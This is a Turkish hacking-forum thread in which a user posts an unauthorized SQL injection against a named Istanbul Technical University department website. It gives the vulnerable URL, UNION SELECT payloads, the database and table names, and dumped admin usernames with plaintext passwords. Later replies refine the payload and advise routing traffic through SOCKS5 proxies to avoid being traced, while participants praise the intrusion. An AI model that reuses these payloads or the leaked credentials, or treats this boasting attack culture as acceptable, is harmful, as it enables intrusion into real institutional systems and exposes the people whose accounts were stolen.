ITÜ Mysql İnjection-Makine

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    İşim düştü itü'nün sitesine girdim. Php?id= görünce dayanamadım. Çektim tabloları işte :) İtü öğrencileri olabilir tbtde umarım işlerine yarar :P Hadi kolay gelsin

    root domain : itu.edu.tr
    atck domain : mkn.itu.edu.tr // itu.edu.tr ile aynı makinada rootlanabilir

    vuln link : http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1

    vuln : http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1+and+1=0+ Union Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12,13,14--

    database : mknweb
    tables :

        adminuser
        anasayfa_duyuru
        anasayfa_duyuru_eng
        bolum_duyuru
        bolum_duyuru_eng
        derskat
        dersler
        dersler_eng
        hocalar

    admin table : adminuser

    columns :

        user
        pass
        level

    after dump-

    user:pass:level:

    hakan:12qwasZX:-1:
    bulent:12qwasZX:-1:

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...

    Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.

     

    Socks5 ile bağlanın rahatınıza bakın.


    "
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Allura bunu yazdı:
    -----------------------------

    Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...

    Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.

     

    Socks5 ile bağlanın rahatınıza bakın.


    -----------------------------

    Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D

    Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var.

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek
    Böle bir konunun sansasyon yaratması gerekirken, müridler bu işe tepkisiz kaldı. Bir iki kanala mail atalım :)

    "
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Puro Sever
    Mr_Dark
    Mr_Dark's avatar
    Kayıt Tarihi: 07/Mayıs/2007
    Erkek

    Ben vuln da yazan url yi yazdım syntax error verdi : | pek anlamam


    !!!!
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DarkF4Te
    DarkF4Te's avatar
    Kayıt Tarihi: 02/Mart/2008
    Erkek

    Tebrikler HolyZone güzel iş :D

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Mr_Dark bunu yazdı:
    -----------------------------

    Ben vuln da yazan url yi yazdım syntax error verdi : | pek anlamam


    -----------------------------

    teknik terim biraz o böyle dene

    http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1+and+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--

    table_name tableler için
    column_name columnlar için

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Puro Sever
    Mr_Dark
    Mr_Dark's avatar
    Kayıt Tarihi: 07/Mayıs/2007
    Erkek

    Anlamam dedim ya işte :|


    !!!!
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Mr_Dark bunu yazdı:
    -----------------------------

    Anlamam dedim ya işte :|


    -----------------------------

    anla diye özel link çıkarttım anla artık :D

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MbK
    MbK's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    HoLyZone bunu yazdı:
    -----------------------------

    Allura bunu yazdı:
    -----------------------------

    Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...

    Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.

     

    Socks5 ile bağlanın rahatınıza bakın.


    -----------------------------

    Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D

    Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var.


    -----------------------------
    iş güzel de yorumun abest :) 17 yaşındakileri de bilişim suçundan öperler :)

    15 yaşını doldurduğun için suç işleme ehliyetine sahip bi insansın sen artık :)


    Çok özel kadınlar tanıdım. Bana hayatı onlar tanıttılar...
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Addict bunu yazdı:
    -----------------------------

    HoLyZone bunu yazdı:
    -----------------------------

    Allura bunu yazdı:
    -----------------------------

    Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...

    Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.

     

    Socks5 ile bağlanın rahatınıza bakın.


    -----------------------------

    Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D

    Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var.


    -----------------------------
    iş güzel de yorumun abest :) 17 yaşındakileri de bilişim suçundan öperler :)

    15 yaşını doldurduğun için suç işleme ehliyetine sahip bi insansın sen artık :)


    -----------------------------

    yok hoca tecrübeliyim merak etme bişey olmuyor :)

Toplam Hit: 3467 Toplam Mesaj: 16